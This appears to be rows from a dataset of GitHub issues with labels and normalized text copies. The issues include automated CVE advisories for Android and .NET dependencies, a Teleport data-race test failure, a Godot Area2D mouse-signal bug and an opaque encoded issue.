## CVE-2020-0245 - High Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>avandroid-10.0.0_r34</b></p></summary> <p> <p>Library home page: <a href=https://android.googlesource.com/platform/frameworks/av>https://android.googlesource.com/platform/frameworks/av</a></p> <p>Found in HEAD commit: <a href="https://github.com/panasalap/frameworks_av/commit/0a9fa8e31b13ebe6a4bc014737cfbc3419cfce1a">0a9fa8e31b13ebe6a4bc014737cfbc3419cfce1a</a></p> <p>Found in base branch: <b>master</b></p></p> </details> </p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Source Files (1)</summary> <p></p> <p> <img src='https://s3.amazonaws.com/wss-public/bitbucketImages/xRedImage.png' width=19 height=20> <b>/media/libstagefright/codecs/m4v_h263/dec/src/vop.cpp</b> </p> </details> <p></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary> <p> In DecodeFrameCombinedMode of combined_decode.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11 Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-152496149 <p>Publish Date: 2020-09-17 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2020-0245>CVE-2020-0245</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>8.8</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: Required - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: High - Integrity Impact: High - Availability Impact: High </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://source.android.com/security/bulletin/2020-09-01">https://source.android.com/security/bulletin/2020-09-01</a></p> <p>Release Date: 2020-07-21</p> <p>Fix Resolution: android-8.0.0_r49,android-8.1.0_r79,android-9.0.0_r59,android-10.0.0_r44</p> </p> </details> <p></p> *** Step up your Open Source Security Game with Mend [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
True
CVE-2020-0245 (High) detected in avandroid-10.0.0_r34 - autoclosed - ## CVE-2020-0245 - High Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>avandroid-10.0.0_r34</b></p></summary> <p> <p>Library home page: <a href=https://android.googlesource.com/platform/frameworks/av>https://android.googlesource.com/platform/frameworks/av</a></p> <p>Found in HEAD commit: <a href="https://github.com/panasalap/frameworks_av/commit/0a9fa8e31b13ebe6a4bc014737cfbc3419cfce1a">0a9fa8e31b13ebe6a4bc014737cfbc3419cfce1a</a></p> <p>Found in base branch: <b>master</b></p></p> </details> </p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Source Files (1)</summary> <p></p> <p> <img src='https://s3.amazonaws.com/wss-public/bitbucketImages/xRedImage.png' width=19 height=20> <b>/media/libstagefright/codecs/m4v_h263/dec/src/vop.cpp</b> </p> </details> <p></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary> <p> In DecodeFrameCombinedMode of combined_decode.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11 Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-152496149 <p>Publish Date: 2020-09-17 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2020-0245>CVE-2020-0245</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>8.8</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: Required - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: High - Integrity Impact: High - Availability Impact: High </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://source.android.com/security/bulletin/2020-09-01">https://source.android.com/security/bulletin/2020-09-01</a></p> <p>Release Date: 2020-07-21</p> <p>Fix Resolution: android-8.0.0_r49,android-8.1.0_r79,android-9.0.0_r59,android-10.0.0_r44</p> </p> </details> <p></p> *** Step up your Open Source Security Game with Mend [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
non_priority
cve high detected in avandroid autoclosed cve high severity vulnerability vulnerable library avandroid library home page a href found in head commit a href found in base branch master vulnerable source files media libstagefright codecs dec src vop cpp vulnerability details in decodeframecombinedmode of combined decode cpp there is a possible out of bounds write due to a heap buffer overflow this could lead to remote information disclosure with no additional execution privileges needed user interaction is needed for exploitation product androidversions android android android android android id a publish date url a href cvss score details base score metrics exploitability metrics attack vector network attack complexity low privileges required none user interaction required scope unchanged impact metrics confidentiality impact high integrity impact high availability impact high for more information on scores click a href suggested fix type upgrade version origin a href release date fix resolution android android android android step up your open source security game with mend
0
31,882
4,294,755,107
IssuesEvent
2016-07-19 02:16:37
geetsisbac/YE7GLKCP77LP3XTRJGXDSBHN
https://api.github.com/repos/geetsisbac/YE7GLKCP77LP3XTRJGXDSBHN
closed
fGgwfrQcxq6r5idxqYMUb8s91FOtwIfmFU5i56GzEYDHKriihOTJVHUQeeuon5JCWR6cnprG7T1AhrZhnHFuwI03KkAy8vV4dPleHTyItxAPUhwF7NIW5jmNSId5HiiBnsnoso9o7algHNYNaTIYWQFK+5Jvft8ym2qqG3MRcn8=
design
2NxPPyh9o82QPQvh+oyJQzbBvevg2seJ5AuxER4+jg+AMQxUnqFq7CVb6WCxernYiVCm9fw6IwLg1RdGyL+nHn7F1386EupQ9skLEiDb+tYyxq8YQQP+8woNXmGKs7X48GjGScAK3BjeKtGgAwyinlqW541TSLIlMYeSZLrR6rN6KVOaATDop4e0m6jY7GZdpvibdxYnVzbgfFQNmQPZcASoa32PEy/pSdb7eZIA8R/R0WqI5a/ogCyH4b+m4v26oz7T4Lj21c9+QeeTQGU7+wv5kKxD9+pL3J9nTi9HisU9WwwlVtwxb4ZSw2hf/jrSIGdjYD6rrsXsAaaEBXoiCCw92v06fhFhMhswxtcqJU3w1nPkWLEQWEHahb+R+5yfmlpM/HwsFaYpRGYkDhT1TxtCuR/Qh9HfZCD/Pp+sFSEpvkpcUgfA/Tg2eslmUKp+TgGyVqpFCZA7v5xEWXcMNrOvNye7SaFMj4B6HkcNNTp8W1OFm3QtIAAHiaLbDbQp+A+tzHzH/xiWrGPdl40KylJE2ipUrLwfPJLBmVifYUKdhgWifwtsPiBNFbeA4xY5pxOJULGjP3HcLcYaGGMnX0P8IfaQMZlv2n9yOIuLKqCpdrY/eO185VTlOg0HXt29VvBOL7naqumTAZ6Q/ReostRajUwT+g48BuN01aupVuDZkbiiLXHYCKFiRVBhhRkLe1woNb+txkTrKeJ56wFyJZJm1Wx3KrruEbZUmbWDsuNV4a2k9WI4jRI4nXGjIv706SZ8BtjefKJa+n82lekZSMOuaTLV0holLZOJe8DoOOxgyDLpijIDUJ0ubqKSVrjocRwqzqo3gEsfKwI1qlDfdpZq1jl4g4SBLnSRmrXmegA=
1.0
fGgwfrQcxq6r5idxqYMUb8s91FOtwIfmFU5i56GzEYDHKriihOTJVHUQeeuon5JCWR6cnprG7T1AhrZhnHFuwI03KkAy8vV4dPleHTyItxAPUhwF7NIW5jmNSId5HiiBnsnoso9o7algHNYNaTIYWQFK+5Jvft8ym2qqG3MRcn8= - 2NxPPyh9o82QPQvh+oyJQzbBvevg2seJ5AuxER4+jg+AMQxUnqFq7CVb6WCxernYiVCm9fw6IwLg1RdGyL+nHn7F1386EupQ9skLEiDb+tYyxq8YQQP+8woNXmGKs7X48GjGScAK3BjeKtGgAwyinlqW541TSLIlMYeSZLrR6rN6KVOaATDop4e0m6jY7GZdpvibdxYnVzbgfFQNmQPZcASoa32PEy/pSdb7eZIA8R/R0WqI5a/ogCyH4b+m4v26oz7T4Lj21c9+QeeTQGU7+wv5kKxD9+pL3J9nTi9HisU9WwwlVtwxb4ZSw2hf/jrSIGdjYD6rrsXsAaaEBXoiCCw92v06fhFhMhswxtcqJU3w1nPkWLEQWEHahb+R+5yfmlpM/HwsFaYpRGYkDhT1TxtCuR/Qh9HfZCD/Pp+sFSEpvkpcUgfA/Tg2eslmUKp+TgGyVqpFCZA7v5xEWXcMNrOvNye7SaFMj4B6HkcNNTp8W1OFm3QtIAAHiaLbDbQp+A+tzHzH/xiWrGPdl40KylJE2ipUrLwfPJLBmVifYUKdhgWifwtsPiBNFbeA4xY5pxOJULGjP3HcLcYaGGMnX0P8IfaQMZlv2n9yOIuLKqCpdrY/eO185VTlOg0HXt29VvBOL7naqumTAZ6Q/ReostRajUwT+g48BuN01aupVuDZkbiiLXHYCKFiRVBhhRkLe1woNb+txkTrKeJ56wFyJZJm1Wx3KrruEbZUmbWDsuNV4a2k9WI4jRI4nXGjIv706SZ8BtjefKJa+n82lekZSMOuaTLV0holLZOJe8DoOOxgyDLpijIDUJ0ubqKSVrjocRwqzqo3gEsfKwI1qlDfdpZq1jl4g4SBLnSRmrXmegA=
non_priority
jg r pp sfsepvkpcugfa a tzhzh reostrajuwt
0
113,474
17,140,605,812
IssuesEvent
2021-07-13 09:11:27
valdisiljuconoks/LocalizationProvider
https://api.github.com/repos/valdisiljuconoks/LocalizationProvider
opened
CVE-2018-8416 (Medium) detected in microsoft.netcore.app.2.1.0.nupkg
security vulnerability
## CVE-2018-8416 - Medium Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>microsoft.netcore.app.2.1.0.nupkg</b></p></summary> <p>A set of .NET API's that are included in the default .NET Core application model. caa7b7e2bad98e56a...</p> <p>Library home page: <a href="https://api.nuget.org/packages/microsoft.netcore.app.2.1.0.nupkg">https://api.nuget.org/packages/microsoft.netcore.app.2.1.0.nupkg</a></p> <p>Path to dependency file: LocalizationProvider/Tests/DbLocalizationProvider.Storage.SqlServer.Tests/DbLocalizationProvider.Storage.SqlServer.Tests.csproj</p> <p>Path to vulnerable library: canner/.nuget/packages/microsoft.netcore.app/2.1.0/microsoft.netcore.app.2.1.0.nupkg</p> <p> Dependency Hierarchy: - :x: **microsoft.netcore.app.2.1.0.nupkg** (Vulnerable Library) </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Vulnerability Details</summary> <p> A tampering vulnerability exists when .NET Core improperly handles specially crafted files, aka ".NET Core Tampering Vulnerability." This affects .NET Core 2.1. <p>Publish Date: 2018-11-14 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2018-8416>CVE-2018-8416</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>6.5</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Network - Attack Complexity: Low - Privileges Required: Low - User Interaction: None - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: None - Integrity Impact: High - Availability Impact: None </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://github.com/dotnet/Announcements/issues/95">https://github.com/dotnet/Announcements/issues/95</a></p> <p>Release Date: 2018-11-14</p> <p>Fix Resolution: 2.1.7</p> </p> </details> <p></p> *** Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
True
CVE-2018-8416 (Medium) detected in microsoft.netcore.app.2.1.0.nupkg - ## CVE-2018-8416 - Medium Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>microsoft.netcore.app.2.1.0.nupkg</b></p></summary> <p>A set of .NET API's that are included in the default .NET Core application model. caa7b7e2bad98e56a...</p> <p>Library home page: <a href="https://api.nuget.org/packages/microsoft.netcore.app.2.1.0.nupkg">https://api.nuget.org/packages/microsoft.netcore.app.2.1.0.nupkg</a></p> <p>Path to dependency file: LocalizationProvider/Tests/DbLocalizationProvider.Storage.SqlServer.Tests/DbLocalizationProvider.Storage.SqlServer.Tests.csproj</p> <p>Path to vulnerable library: canner/.nuget/packages/microsoft.netcore.app/2.1.0/microsoft.netcore.app.2.1.0.nupkg</p> <p> Dependency Hierarchy: - :x: **microsoft.netcore.app.2.1.0.nupkg** (Vulnerable Library) </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Vulnerability Details</summary> <p> A tampering vulnerability exists when .NET Core improperly handles specially crafted files, aka ".NET Core Tampering Vulnerability." This affects .NET Core 2.1. <p>Publish Date: 2018-11-14 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2018-8416>CVE-2018-8416</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>6.5</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Network - Attack Complexity: Low - Privileges Required: Low - User Interaction: None - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: None - Integrity Impact: High - Availability Impact: None </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://github.com/dotnet/Announcements/issues/95">https://github.com/dotnet/Announcements/issues/95</a></p> <p>Release Date: 2018-11-14</p> <p>Fix Resolution: 2.1.7</p> </p> </details> <p></p> *** Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
non_priority
cve medium detected in microsoft netcore app nupkg cve medium severity vulnerability vulnerable library microsoft netcore app nupkg a set of net api s that are included in the default net core application model library home page a href path to dependency file localizationprovider tests dblocalizationprovider storage sqlserver tests dblocalizationprovider storage sqlserver tests csproj path to vulnerable library canner nuget packages microsoft netcore app microsoft netcore app nupkg dependency hierarchy x microsoft netcore app nupkg vulnerable library vulnerability details a tampering vulnerability exists when net core improperly handles specially crafted files aka net core tampering vulnerability this affects net core publish date url a href cvss score details base score metrics exploitability metrics attack vector network attack complexity low privileges required low user interaction none scope unchanged impact metrics confidentiality impact none integrity impact high availability impact none for more information on scores click a href suggested fix type upgrade version origin a href release date fix resolution step up your open source security game with whitesource
0
262,808
22,961,081,438
IssuesEvent
2022-07-19 15:25:28
gravitational/teleport
https://api.github.com/repos/gravitational/teleport
closed
`TestAgentStart` flakiness
flaky tests
## Failure #### Link(s) to logs - https://console.cloud.google.com/cloud-build/builds;region=us-west1/1d1d3095-984a-4a8e-9091-bd97a8f6be9c?project=ci-account #### Relevant snippet ``` WARNING: DATA RACE Write at 0x00c0001f00a8 by goroutine 68: github.com/gravitational/teleport/lib/reversetunnel.TestAgentStart.func2.1() /workspace/lib/reversetunnel/agent_test.go:275 +0x66 github.com/gravitational/teleport/lib/reversetunnel.(*mockSSHChannel).SendRequest() /workspace/lib/reversetunnel/agent_test.go:122 +0xa2 github.com/gravitational/teleport/lib/reversetunnel.(*agent).handleDrainChannels() /workspace/lib/reversetunnel/agent.go:543 +0x68f github.com/gravitational/teleport/lib/reversetunnel.(*agent).Start.func3() /workspace/lib/reversetunnel/agent.go:324 +0x45 Previous read at 0x00c0001f00a8 by goroutine 61: github.com/gravitational/teleport/lib/reversetunnel.TestAgentStart() /workspace/lib/reversetunnel/agent_test.go:298 +0x684 testing.tRunner() /opt/go/src/testing/testing.go:1439 +0x213 testing.(*T).Run.func1() /opt/go/src/testing/testing.go:1486 +0x47 Goroutine 68 (running) created at: github.com/gravitational/teleport/lib/reversetunnel.(*agent).Start() /workspace/lib/reversetunnel/agent.go:323 +0x555 github.com/gravitational/teleport/lib/reversetunnel.TestAgentStart() /workspace/lib/reversetunnel/agent_test.go:294 +0x5d0 testing.tRunner() /opt/go/src/testing/testing.go:1439 +0x213 testing.(*T).Run.func1() /opt/go/src/testing/testing.go:1486 +0x47 Goroutine 61 (finished) created at: testing.(*T).Run() /opt/go/src/testing/testing.go:1486 +0x724 testing.runTests.func1() /opt/go/src/testing/testing.go:1839 +0x99 testing.tRunner() /opt/go/src/testing/testing.go:1439 +0x213 testing.runTests() /opt/go/src/testing/testing.go:1837 +0x7e4 testing.(*M).Run() /opt/go/src/testing/testing.go:1719 +0xa71 main.main() _testmain.go:173 +0x3a9 ================== === CONT TestAgentCertChecker testing.go:1312: race detected during execution of test --- FAIL: TestAgentCertChecker (5.77s) =================================================== OUTPUT github.com/gravitational/teleport/lib/reversetunnel.TestAgentStart =================================================== === RUN TestAgentStart agent_test.go:299: Error Trace: agent_test.go:299 Error: Not equal: expected: 1 actual : 0 Test: TestAgentStart Messages: Expected 1 version reply. --- FAIL: TestAgentStart (0.00s) ================== WARNING: DATA RACE Write at 0x00c0001f00b8 by goroutine 66: github.com/gravitational/teleport/lib/reversetunnel.TestAgentStart.func3() /workspace/lib/reversetunnel/agent_test.go:287 +0x84 github.com/gravitational/teleport/lib/reversetunnel.(*mockSSHClient).Reply() /workspace/lib/reversetunnel/agent_test.go:94 +0xa6 github.com/gravitational/teleport/lib/reversetunnel.(*agent).handleGlobalRequests() /workspace/lib/reversetunnel/agent.go:457 +0x928 github.com/gravitational/teleport/lib/reversetunnel.(*agent).connect.func1() /workspace/lib/reversetunnel/agent.go:372 +0x94 Previous read at 0x00c0001f00b8 by goroutine 61: github.com/gravitational/teleport/lib/reversetunnel.TestAgentStart() /workspace/lib/reversetunnel/agent_test.go:299 +0x704 testing.tRunner() /opt/go/src/testing/testing.go:1439 +0x213 testing.(*T).Run.func1() /opt/go/src/testing/testing.go:1486 +0x47 Goroutine 66 (running) created at: github.com/gravitational/teleport/lib/reversetunnel.(*agent).connect() /workspace/lib/reversetunnel/agent.go:371 +0x4ca github.com/gravitational/teleport/lib/reversetunnel.(*agent).Start() /workspace/lib/reversetunnel/agent.go:305 +0x3d1 github.com/gravitational/teleport/lib/reversetunnel.TestAgentStart() /workspace/lib/reversetunnel/agent_test.go:294 +0x5d0 testing.tRunner() /opt/go/src/testing/testing.go:1439 +0x213 testing.(*T).Run.func1() /opt/go/src/testing/testing.go:1486 +0x47 Goroutine 61 (finished) created at: testing.(*T).Run() /opt/go/src/testing/testing.go:1486 +0x724 testing.runTests.func1() /opt/go/src/testing/testing.go:1839 +0x99 testing.tRunner() /opt/go/src/testing/testing.go:1439 +0x213 testing.runTests() /opt/go/src/testing/testing.go:1837 +0x7e4 testing.(*M).Run() /opt/go/src/testing/testing.go:1719 +0xa71 main.main() _testmain.go:173 +0x3a9 ```
1.0
`TestAgentStart` flakiness - ## Failure #### Link(s) to logs - https://console.cloud.google.com/cloud-build/builds;region=us-west1/1d1d3095-984a-4a8e-9091-bd97a8f6be9c?project=ci-account #### Relevant snippet ``` WARNING: DATA RACE Write at 0x00c0001f00a8 by goroutine 68: github.com/gravitational/teleport/lib/reversetunnel.TestAgentStart.func2.1() /workspace/lib/reversetunnel/agent_test.go:275 +0x66 github.com/gravitational/teleport/lib/reversetunnel.(*mockSSHChannel).SendRequest() /workspace/lib/reversetunnel/agent_test.go:122 +0xa2 github.com/gravitational/teleport/lib/reversetunnel.(*agent).handleDrainChannels() /workspace/lib/reversetunnel/agent.go:543 +0x68f github.com/gravitational/teleport/lib/reversetunnel.(*agent).Start.func3() /workspace/lib/reversetunnel/agent.go:324 +0x45 Previous read at 0x00c0001f00a8 by goroutine 61: github.com/gravitational/teleport/lib/reversetunnel.TestAgentStart() /workspace/lib/reversetunnel/agent_test.go:298 +0x684 testing.tRunner() /opt/go/src/testing/testing.go:1439 +0x213 testing.(*T).Run.func1() /opt/go/src/testing/testing.go:1486 +0x47 Goroutine 68 (running) created at: github.com/gravitational/teleport/lib/reversetunnel.(*agent).Start() /workspace/lib/reversetunnel/agent.go:323 +0x555 github.com/gravitational/teleport/lib/reversetunnel.TestAgentStart() /workspace/lib/reversetunnel/agent_test.go:294 +0x5d0 testing.tRunner() /opt/go/src/testing/testing.go:1439 +0x213 testing.(*T).Run.func1() /opt/go/src/testing/testing.go:1486 +0x47 Goroutine 61 (finished) created at: testing.(*T).Run() /opt/go/src/testing/testing.go:1486 +0x724 testing.runTests.func1() /opt/go/src/testing/testing.go:1839 +0x99 testing.tRunner() /opt/go/src/testing/testing.go:1439 +0x213 testing.runTests() /opt/go/src/testing/testing.go:1837 +0x7e4 testing.(*M).Run() /opt/go/src/testing/testing.go:1719 +0xa71 main.main() _testmain.go:173 +0x3a9 ================== === CONT TestAgentCertChecker testing.go:1312: race detected during execution of test --- FAIL: TestAgentCertChecker (5.77s) =================================================== OUTPUT github.com/gravitational/teleport/lib/reversetunnel.TestAgentStart =================================================== === RUN TestAgentStart agent_test.go:299: Error Trace: agent_test.go:299 Error: Not equal: expected: 1 actual : 0 Test: TestAgentStart Messages: Expected 1 version reply. --- FAIL: TestAgentStart (0.00s) ================== WARNING: DATA RACE Write at 0x00c0001f00b8 by goroutine 66: github.com/gravitational/teleport/lib/reversetunnel.TestAgentStart.func3() /workspace/lib/reversetunnel/agent_test.go:287 +0x84 github.com/gravitational/teleport/lib/reversetunnel.(*mockSSHClient).Reply() /workspace/lib/reversetunnel/agent_test.go:94 +0xa6 github.com/gravitational/teleport/lib/reversetunnel.(*agent).handleGlobalRequests() /workspace/lib/reversetunnel/agent.go:457 +0x928 github.com/gravitational/teleport/lib/reversetunnel.(*agent).connect.func1() /workspace/lib/reversetunnel/agent.go:372 +0x94 Previous read at 0x00c0001f00b8 by goroutine 61: github.com/gravitational/teleport/lib/reversetunnel.TestAgentStart() /workspace/lib/reversetunnel/agent_test.go:299 +0x704 testing.tRunner() /opt/go/src/testing/testing.go:1439 +0x213 testing.(*T).Run.func1() /opt/go/src/testing/testing.go:1486 +0x47 Goroutine 66 (running) created at: github.com/gravitational/teleport/lib/reversetunnel.(*agent).connect() /workspace/lib/reversetunnel/agent.go:371 +0x4ca github.com/gravitational/teleport/lib/reversetunnel.(*agent).Start() /workspace/lib/reversetunnel/agent.go:305 +0x3d1 github.com/gravitational/teleport/lib/reversetunnel.TestAgentStart() /workspace/lib/reversetunnel/agent_test.go:294 +0x5d0 testing.tRunner() /opt/go/src/testing/testing.go:1439 +0x213 testing.(*T).Run.func1() /opt/go/src/testing/testing.go:1486 +0x47 Goroutine 61 (finished) created at: testing.(*T).Run() /opt/go/src/testing/testing.go:1486 +0x724 testing.runTests.func1() /opt/go/src/testing/testing.go:1839 +0x99 testing.tRunner() /opt/go/src/testing/testing.go:1439 +0x213 testing.runTests() /opt/go/src/testing/testing.go:1837 +0x7e4 testing.(*M).Run() /opt/go/src/testing/testing.go:1719 +0xa71 main.main() _testmain.go:173 +0x3a9 ```
non_priority
testagentstart flakiness failure link s to logs relevant snippet warning data race write at by goroutine github com gravitational teleport lib reversetunnel testagentstart workspace lib reversetunnel agent test go github com gravitational teleport lib reversetunnel mocksshchannel sendrequest workspace lib reversetunnel agent test go github com gravitational teleport lib reversetunnel agent handledrainchannels workspace lib reversetunnel agent go github com gravitational teleport lib reversetunnel agent start workspace lib reversetunnel agent go previous read at by goroutine github com gravitational teleport lib reversetunnel testagentstart workspace lib reversetunnel agent test go testing trunner opt go src testing testing go testing t run opt go src testing testing go goroutine running created at github com gravitational teleport lib reversetunnel agent start workspace lib reversetunnel agent go github com gravitational teleport lib reversetunnel testagentstart workspace lib reversetunnel agent test go testing trunner opt go src testing testing go testing t run opt go src testing testing go goroutine finished created at testing t run opt go src testing testing go testing runtests opt go src testing testing go testing trunner opt go src testing testing go testing runtests opt go src testing testing go testing m run opt go src testing testing go main main testmain go cont testagentcertchecker testing go race detected during execution of test fail testagentcertchecker output github com gravitational teleport lib reversetunnel testagentstart run testagentstart agent test go error trace agent test go error not equal expected actual test testagentstart messages expected version reply fail testagentstart warning data race write at by goroutine github com gravitational teleport lib reversetunnel testagentstart workspace lib reversetunnel agent test go github com gravitational teleport lib reversetunnel mocksshclient reply workspace lib reversetunnel agent test go github com gravitational teleport lib reversetunnel agent handleglobalrequests workspace lib reversetunnel agent go github com gravitational teleport lib reversetunnel agent connect workspace lib reversetunnel agent go previous read at by goroutine github com gravitational teleport lib reversetunnel testagentstart workspace lib reversetunnel agent test go testing trunner opt go src testing testing go testing t run opt go src testing testing go goroutine running created at github com gravitational teleport lib reversetunnel agent connect workspace lib reversetunnel agent go github com gravitational teleport lib reversetunnel agent start workspace lib reversetunnel agent go github com gravitational teleport lib reversetunnel testagentstart workspace lib reversetunnel agent test go testing trunner opt go src testing testing go testing t run opt go src testing testing go goroutine finished created at testing t run opt go src testing testing go testing runtests opt go src testing testing go testing trunner opt go src testing testing go testing runtests opt go src testing testing go testing m run opt go src testing testing go main main testmain go
0
363,418
25,449,863,498
IssuesEvent
2022-11-24 09:38:04
godotengine/godot
https://api.github.com/repos/godotengine/godot
closed
Area2D mouse_entered and mouse_exited signals not called in Viewport
discussion confirmed documentation topic:physics
<!-- Please search existing issues for potential duplicates before filing yours: https://github.com/godotengine/godot/issues?q=is%3Aissue --> **Godot version:** <!-- Specify commit hash if non-official. --> Tested with 4f697f73a5ac567c1dc22ce44a7fab98f619dfe3 **OS/device including version:** <!-- Specify GPU model and drivers if graphics-related. --> Linux Mint 19.1 tessa 64 Bit **Issue description:** <!-- What happened, and what was expected. --> When using Area2D in a Viewport the mouse_entered and mouse_exited signals are never called. **Steps to reproduce:** Use the test project. When you run the project you see two godot-icons. Both icons are unmodified instances of `Area2D.tscn`. The one on the left is contained in a Viewport and does not print any messages when it should receive mouse enter and exit signals. The one on the right will print messages when the mouse enters/exits the icon. Additional info: The UI node's mouse filter is set to `pass`. The ViewportContainer node's mouse filter is set to `pass`. The Viewport's setting `Handle input locally` was tested enabled and disabled. The Viewport's setting `Disable input` is disabled. The Viewport's setting `Own World` was tested enabled and disabled. **Minimal reproduction project:** <!-- Recommended as it greatly speeds up debugging. Drag and drop a zip archive to upload it. --> [ViewportIssue.zip](https://github.com/godotengine/godot/files/2896342/ViewportIssue.zip)
1.0
Area2D mouse_entered and mouse_exited signals not called in Viewport - <!-- Please search existing issues for potential duplicates before filing yours: https://github.com/godotengine/godot/issues?q=is%3Aissue --> **Godot version:** <!-- Specify commit hash if non-official. --> Tested with 4f697f73a5ac567c1dc22ce44a7fab98f619dfe3 **OS/device including version:** <!-- Specify GPU model and drivers if graphics-related. --> Linux Mint 19.1 tessa 64 Bit **Issue description:** <!-- What happened, and what was expected. --> When using Area2D in a Viewport the mouse_entered and mouse_exited signals are never called. **Steps to reproduce:** Use the test project. When you run the project you see two godot-icons. Both icons are unmodified instances of `Area2D.tscn`. The one on the left is contained in a Viewport and does not print any messages when it should receive mouse enter and exit signals. The one on the right will print messages when the mouse enters/exits the icon. Additional info: The UI node's mouse filter is set to `pass`. The ViewportContainer node's mouse filter is set to `pass`. The Viewport's setting `Handle input locally` was tested enabled and disabled. The Viewport's setting `Disable input` is disabled. The Viewport's setting `Own World` was tested enabled and disabled. **Minimal reproduction project:** <!-- Recommended as it greatly speeds up debugging. Drag and drop a zip archive to upload it. --> [ViewportIssue.zip](https://github.com/godotengine/godot/files/2896342/ViewportIssue.zip)
non_priority
mouse entered and mouse exited signals not called in viewport please search existing issues for potential duplicates before filing yours godot version tested with os device including version linux mint tessa bit issue description when using in a viewport the mouse entered and mouse exited signals are never called steps to reproduce use the test project when you run the project you see two godot icons both icons are unmodified instances of tscn the one on the left is contained in a viewport and does not print any messages when it should receive mouse enter and exit signals the one on the right will print messages when the mouse enters exits the icon additional info the ui node s mouse filter is set to pass the viewportcontainer node s mouse filter is set to pass the viewport s setting handle input locally was tested enabled and disabled the viewport s setting disable input is disabled the viewport s setting own world was tested enabled and disabled minimal reproduction project
0
86,414
24,843,593,876
IssuesEvent
2022-10-26 14:23:00
expo/eas-cli
https://api.github.com/repos/expo/eas-cli
closed
showing old device list, unable to add new devices
needs review eas build
